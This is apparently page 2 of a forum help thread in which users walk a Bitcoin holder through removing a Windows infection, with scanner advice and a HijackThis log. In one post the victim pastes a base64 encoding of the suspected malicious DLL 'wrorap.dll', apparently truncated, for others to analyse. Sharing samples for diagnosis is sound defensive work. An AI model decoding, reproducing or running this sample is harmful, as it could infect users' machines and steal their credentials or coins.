[Solved] Windows infection: please help a security newbie - page 2.

dree12

legendary

Activity: 1246

Merit: 1077

Quote from: sadpandatech on July 22, 2012, 08:09:08 PM

edit; if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the windows update functions.

None of these services exist anymore:

BITS
Microsoft Antimalware
Windows Firewall
Windows Update

Quote from: sadpandatech on July 22, 2012, 08:09:08 PM

Are you using a device from Midiman called M-Audio or some such via firewire?

The file has definately been renamed and corrupted. Here are some suspicious traits:

Code:

No permissions have been assigned for this object.

Warning: this is a potential security risk because anyone who can access this object can take ownership of it. The object’s owner should assign permissions as soon as possible.

Code:

Original filename: mafwcpl.exe

sadpandatech

hero member

Activity: 504

Merit: 500

Are you using a device from Midiman called M-Audio or some such via firewire?

edit; if it will let you, enable the BITS (Background Intelligent Transfer Service) service from services.msc and see if you can then access the windows update functions.

dree12

legendary

Activity: 1246

Merit: 1077

Quote from: sadpandatech on July 22, 2012, 07:42:57 PM

Quote from: dree12 on July 22, 2012, 07:34:45 PM

Quote from: sadpandatech on July 22, 2012, 07:28:43 PM

What is this;
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep

Nothing else stands out to me atleast.

Do I "fix" it?

Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again.

First kill all the iexplorer.exe running in taskmanager, that's scary. ;p And the Flash_util_activex after.

Then browse to My Computer, click the c: drive and use the search box at top right to search for wrorap.dll What we are wanting to do is, one get a copy of it and, two find out when it was created. Please email a copy to 'titusville tech AT gmail . com (remove spaces).
Once you know the date it was creatd do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file atleast.

Let us know if your date modified/created search returns anything unusual.

cheers

Here's the file in base64 encoding (I also sent an email, but this is more public).

Code:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAADRDTOwlWxd45VsXeOVbF3j93NO45dsXePucFHjl2xd431zV+OQbF3jlWxc
46FsXeMtalvjlGxd431zVuOebF3jfXNZ45FsXeNSaWNolWxd4wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAFBFAABMAQUAxoGeSwAAAAAAAAAA4AACIQsBCAAARgEAAJIFAAAAAACKmAAAABAAAABgAQAA
AAAQABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAAAHAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQ
AAAAAAAAEAAAAMSdAgCQAAAAtJICAHgAAAAA4AUAnv8AAAAAAAAAAAAAAAAAAAAAAAAA4AYA1BUA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAQAUAgAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADQRQEAABAAAABGAQAABAAAAAAAAAAAAAAA
AAAAIAAAYC5yZGF0YQAAY10DAABgAQAAXgMAAEoBAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAHwd
AQAAwAQAABgBAACoBAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADJ/wAAAOAFAAAAAQAAwAUAAAAA
AAAAAAAAAAAAQAAAQC5yZWxvYwAA/BUAAADgBgAAFgAAAMAGAAAAAAAAAAAAAAAAAEAAAEAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
hcCJRCQcD4Xz+///iy

Edit: There was something here, but I realized that was the quarantine. Never mind.

sadpandatech

hero member

Activity: 504

Merit: 500

Quote from: dree12 on July 22, 2012, 07:34:45 PM

Quote from: sadpandatech on July 22, 2012, 07:28:43 PM

What is this;
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep

Nothing else stands out to me atleast.

Do I "fix" it?

Most definitely! Before you go wiping it though, let's make sure it did not make any way to copy itself again.

First kill all the iexplorer.exe running in taskmanager, that's scary. ;p And the Flash_util_activex after.

Then browse to My Computer, click the c: drive and use the search box at top right to search for wrorap.dll What we are wanting to do is, one get a copy of it and, two find out when it was created. Please email a copy to 'titusville tech AT gmail . com (remove spaces).
Once you know the date it was creatd do another file search for all files created or modified on that same date, using the advanced search functions. Please share if you find anything. At this point also run the fix for that one file atleast.

Let us know if your date modified/created search returns anything unusual.

cheers

dree12

legendary

Activity: 1246

Merit: 1077

sadpandatech

hero member

Activity: 504

Merit: 500

If you do feel the need to move your coins, be sure to do it from a clean computer.

Did you mention the spec on your machine?

What processor, ram, vid card?

sadpandatech

hero member

Activity: 504

Merit: 500

sadpandatech

hero member

Activity: 504

Merit: 500

Quote from: check_status on July 22, 2012, 07:03:09 PM

Quote from: sadpandatech on July 22, 2012, 06:51:10 PM

Do them all in safe mode first.

Some infections run even in safe mode, so this is not a solution.

It is not a solution. it's the right way to do it..

Sorry, I also did not realize this thread was supposed to be a tech support 'wang off'. ;p

dree12

legendary

Activity: 1246

Merit: 1077

Quote from: check_status on July 22, 2012, 06:43:31 PM

To get Malwarebytes to run properly, open the folder where Malwarebytes resides, rename the .exe to explorer.exe or firefox.exe.
Now Right click, run as admin, your renamed .exe. Malwarebytes should run as normal. Some infections block specific processes by name.

Malwarebytes is a specialized scanner that doesn't look for common infections so you will need another scanner to look for other issues.
WinMHR, after your Malwarebytes scan would be a good choice. They supply all of the AV companies with samples, so there database is much more complete, but it doesn't clean, only detects known non rootkit malware.

After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their Hash search. This will tell you which AV companies are detecting it and so which ones can clean it.

Cheers

Noted. Malwarebytes is running fine.

Quote from: sadpandatech on July 22, 2012, 06:51:10 PM

Quote from: amencon on July 22, 2012, 06:04:21 PM

If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.

Always be wary of the system in the future if you decide not to "nuke it from orbit" though.

curious here too. malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run Combofix and Gmer. I noticed you said you tried tdsskiller. Have you tried running rootkit revealer? Do them all in safe mode first.

If you still are not getting anything, you can try running process explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders.

If all else fails, post us a copy of your Hijack This log.

cheers

Rootkit revealer doesn't work on Windows 7.

Code:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:04:54, on 2012-07-22
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16447)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft IntelliPoint\ipoint.exe
C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe
C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil32_11_3_300_265_ActiveX.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Users\~\AppData\Local\Temp\Temp1_ProcessExplorer.zip\procexp.exe
C:\Users\~\Downloads\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ca.msn.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer, optimized for Bing and MSN
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
R3 - URLSearchHook: (no name) -  - (no file)
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [Microsoft Default Manager] "C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [IntelliPoint] "c:\Program Files\Microsoft IntelliPoint\ipoint.exe"
O4 - HKLM\..\Run: [TortoiseHgOverlayIconServer] C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MIF5BA~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MIF5BA~1\Office14\ONBttnIE.dll/105
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://www.w3.org
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
O16 - DPF: {339C1EE2-1029-46B8-81F1-360217F26FC4} (PowerCreator VGAPlayer Control) - http://mms.hwjyw.com/courseware///courseware/2008-2-28/pengjunjiangzuo31204167051316/VGAPlayer.cab
O16 - DPF: {444785F1-DE89-4295-863A-D46C3A781394} - http://webplayer.unity3d.com/download_webplayer-2.x/UnityWebPlayer.cab
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
O16 - DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - http://www.sibelius.com/download/software/win/ActiveXPlugin.cab
O16 - DPF: {D1278801-B2C0-4332-BD3E-2F64D2204EDF} (Windows Live Mesh Upload Tool) - https://www.mesh.com/0.9.4014.21/TSWeb.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe

--
End of file - 6224 bytes

(edited to remove my name, which means the byte count is incorrect).

I'm wondering, is it usually good practice to move the coins to a new wallet in this situation? The wallet is encrypted with a decent passphrase.

check_status

full member

Activity: 196

Merit: 100

Web Dev, Db Admin, Computer Technician

Quote from: sadpandatech on July 22, 2012, 06:51:10 PM

Have you tried running rootkit revealer?

Really!! Mark still keeps this tool up to date, I thought he stopped developing it in 2008?

Quote from: sadpandatech on July 22, 2012, 06:51:10 PM

Do them all in safe mode first.

Some infections run even in safe mode, so this is not a solution.

sadpandatech

hero member

Activity: 504

Merit: 500

Quote from: amencon on July 22, 2012, 06:04:21 PM

If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.

Always be wary of the system in the future if you decide not to "nuke it from orbit" though.

curious here too. malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run Combofix and Gmer. I noticed you said you tried tdsskiller. Have you tried running rootkit revealer? Do them all in safe mode first.

If you still are not getting anything, you can try running process explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders.

If all else fails, post us a copy of your Hijack This log.

cheers

check_status

full member

Activity: 196

Merit: 100

Web Dev, Db Admin, Computer Technician

To get Malwarebytes to run properly, open the folder where Malwarebytes resides, rename the .exe to explorer.exe or firefox.exe.
Now Right click, run as admin, your renamed .exe. Malwarebytes should run as normal. Some infections block specific processes by name.

Malwarebytes is a specialized scanner that doesn't look for common infections so you will need another scanner to look for other issues.
WinMHR, after your Malwarebytes scan would be a good choice. They supply all of the AV companies with samples, so there database is much more complete, but it doesn't clean, only detects known non rootkit malware.

After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their Hash search. This will tell you which AV companies are detecting it and so which ones can clean it.

Cheers

dree12

legendary

Activity: 1246

Merit: 1077

Quote from: amencon on July 22, 2012, 06:04:21 PM

To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge.

As for your current infection Malwarebytes and combofix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file http://pctechnotes.com/how-to-reset-windows-hosts-file/).

If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.

Always be wary of the system in the future if you decide not to "nuke it from orbit" though.

Thanks.

The hosts file is normal. The computer recently bluescreened, bringing Malwarebytes down with it (it's running again). Combofix isn't working (can't write "iexplore.exe").

I'm backing up the other important things now, in case worse goes to worse and a fresh install is necessary.

myrkul

hero member

Activity: 532

Merit: 500

FIAT LIBERTAS RVAT CAELVM

Quote from: amencon on July 22, 2012, 06:04:21 PM

To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge.

This^

Ever since I switched to Firefox+Noscript, the only experiences I've had with malware of any sort is clearing it off my friends' computers.

finkleshnorts

sr. member

Activity: 336

Merit: 250

Quote from: dree12 on July 22, 2012, 06:03:33 PM

Quote from: finkleshnorts on July 22, 2012, 05:30:16 PM

Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.

One of the advantages Bitcoin offers is greater security

.

I consider myself lucky that they didn't get into my wallet or private keys (ditched those). The VISA refund was nice, too.

Good luck!

amencon

sr. member

Activity: 410

Merit: 250

To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the no-script plugin running. This way no script is run without your consent and knowledge.

As for your current infection Malwarebytes and combofix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file http://pctechnotes.com/how-to-reset-windows-hosts-file/).

If malwarebytes/Combofix/GMER doesn't set you straight update the thread and let us know what still isn't working right.

Always be wary of the system in the future if you decide not to "nuke it from orbit" though.

dree12

legendary

Activity: 1246

Merit: 1077

Quote from: finkleshnorts on July 22, 2012, 05:30:16 PM

Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.

One of the advantages Bitcoin offers is greater security

.

Quote from: finkleshnorts on July 22, 2012, 05:30:16 PM

Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.

Running GMER right now. Meanwhile, I'm copying the files I mentioned to a USB key. Hopefully this works.

unclemantis

member

Activity: 98

Merit: 10

(:firstbits => "1mantis")

I really need to get around to just biting the bullet and run nothing but linux

finkleshnorts

sr. member

Activity: 336

Merit: 250

Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.

Raoul Duke

legendary

Activity: 1358

Merit: 1002

Run this http://www.surfright.nl/en/hitmanpro/

No installation is needed so it may save your day

Topic: [Solved] Windows infection: please help a security newbie - page 2. (Read 6573 times)